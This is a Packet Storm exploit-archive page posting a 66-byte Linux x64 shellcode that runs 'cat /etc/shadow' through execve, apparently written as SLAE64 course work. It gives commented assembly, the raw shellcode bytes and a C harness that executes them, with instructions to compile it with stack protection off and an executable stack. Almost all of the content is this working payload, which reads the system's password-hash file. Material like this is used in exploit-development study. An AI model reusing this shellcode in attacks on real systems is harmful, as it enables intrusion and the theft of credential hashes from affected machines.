exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Linux/x64 execve cat /etc/shadow Shellcode

Linux/x64 execve cat /etc/shadow Shellcode
Posted Feb 9, 2021
Authored by Felipe Winsnes

66 bytes small Linux/x64 execve "cat /etc/shadow" shellcode.

tags | shellcode
systems | linux
SHA-256 | 36a64052472bd1336a1edf41b4a7f78a824d3c320e3d02eb95dae19a8e038433

Linux/x64 execve cat /etc/shadow Shellcode

Change Mirror Download
# Exploit Title: Linux/x64 - execve "cat /etc/shadow" Shellcode (66 bytes)
# Date: 02-08-2021
# Author: Felipe Winsnes
# Tested on: Debian x64
# Shellcode Length: 66

/*
global _start

_start:

xor rax, rax ; Zeroes out RAX.
xor rbp, rbp ; Zeroes out RBP.

push rax ; Pushes RAX's NULL-DWORD.

mov rbp, 0x776f646168732f63 ; Moves value "wodahs/c" into RBP.
push rbp ; Pushes the vaueof RBP into the Stack.

mov rbp, 0x74652f2f2f2f2f2f ; Moves value "te//////" into RBP.
push rbp ; Pushes the vaue of RBP into the Stack.

mov rbp, rsp ; Copies the value of the Stack into RBP.
push rax ; Pushes RAX's NULL-DWORD.

mov rbx, 0x7461632f6e69622f ; Moves value "tac/nib/" into RBX.
push rbx ; Pushes the vaue of RBX into the Stack.

mov rbx, rsp ; Copies the value of the Stack into RBX.

mov rdi, rsp ; Copies the value of the Stack into RDI.
push rax ; Pushes RAX's NULL-DWORD.

mov rdx, rsp ; Copies the value of the Stack into RDX. As the previous DWORD was completely NULL, RDX is set to 0.

push rbp ; Pushes the vaue of RBP into the Stack.
push rbx ; Pushes the vaue of RBX into the Stack. The full string should be "cat /etc/shadow".

mov rsi, rsp ; Copies this entire string from the Stack into RSI.

push word 59 ; Pushes the value 59 (syscall value for execve in the x64 format).
pop ax ; Pops this value into AX so there are no NULLs.
syscall ; The syscall is executed.
*/


/*
Usage:
whitecr0wz@SLAE64:~/assembly/execve/cat$ gcc cat_shadow.c -o cat_shadow -fno-stack-protector -z execstack -w
whitecr0wz@SLAE64:~/assembly/execve/cat$ ./cat_shadow
*/

#include <stdio.h>

unsigned char shellcode[] = \
"\x48\x31\xc0\x48\x31\xed\x50\x48\xbd\x63\x2f\x73\x68\x61\x64\x6f\x77\x55\x48\xbd\x2f\x2f\x2f\x2f\x2f\x2f\x65\x74\x55\x48\x89\xe5\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x63\x61\x74\x53\x48\x89\xe3\x48\x89\xe7\x50\x48\x89\xe2\x55\x53\x48\x89\xe6\x66\x6a\x3b\x66\x58\x0f\x05";

int main()
{

int (*ret)() = (int(*)())shellcode;
ret();
}

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close